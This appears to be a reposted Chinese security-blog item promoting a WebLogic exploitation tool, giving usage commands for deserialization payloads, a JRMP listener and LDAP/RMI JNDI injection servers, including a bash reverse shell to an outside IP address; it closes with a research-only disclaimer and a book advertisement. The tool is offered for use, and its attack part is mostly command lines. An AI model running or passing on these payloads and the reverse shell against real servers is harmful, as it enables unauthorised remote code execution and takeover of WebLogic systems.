weblogic历史漏洞利用工具 -- weblogicExploit
2022-7-28 00:4:49 Author: web安全工具库(查看原文) 阅读量:68 收藏

项目作者:8ypass
项目地址:https://github.com/8ypass/weblogicExploit
一、工具介绍
工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能。

二、安装与使用

1、列出可控payloads
java -jar weblogic.jar -payloads
2、启动JRMPListener
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
3、启动LDAP/RMI
LDAPjava -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618RMIjava -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
4、高版本jndi注入 ldap
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'

java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'
三、下载地址:
1、通过项目地址下载
2、关注web安全工具库公众号,后台回复:20220728

四、声明:

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

推荐书籍

加我微信:ivu123ivu,进送书活动群,不定时免费送书

《精通Vue.js:Web前端开发技术详解》

本书循序渐进地介绍了Vue框架的用法,主要内容包括前后端分离的基本原理、MVVM设计模式、Vue的基本用法、内置指令、自定义指令、计算属性和数据监听、绑定表单、绑定CSS样式、CSS过渡和动画、Vue组件的开发、Vue CLI脚手架工具、路由管理器、组合API、Axios和状态管理等。本书内容通俗易懂,案例丰富,理论和实践紧密结合。本书的范例采用Vue 3,最后一章提供了一个整合前端与后端的综合案例,帮助读者迅速掌握开发实用Web应用的技巧。本书适合所有前端Web开发人员阅读,无论是初学者还是已经有开发经验的从业人员,都能从本书中受益。另外,本书也适合作为相关培训机构的教材。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247502483&idx=1&sn=2acf200fe3711429231b0356cd1a8c4b&chksm=ebb52590dcc2ac8637882da72bf137f3740211ed78ea6b51e5110dd33b3aa796119357ea2021#rd
如有侵权请联系:admin#unsafe.sh